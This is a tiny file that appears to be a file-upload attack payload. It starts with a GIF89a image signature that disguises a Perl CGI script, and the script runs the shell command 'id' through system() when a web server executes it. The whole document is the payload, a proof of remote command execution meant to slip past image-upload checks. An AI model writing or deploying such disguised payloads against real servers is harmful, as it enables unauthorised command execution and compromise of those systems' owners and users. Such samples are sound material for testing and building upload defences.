GIF89a; #!/usr/bin/perl print "Content-type: text/html\n\n"; print "Hello from Perl!"; system("id");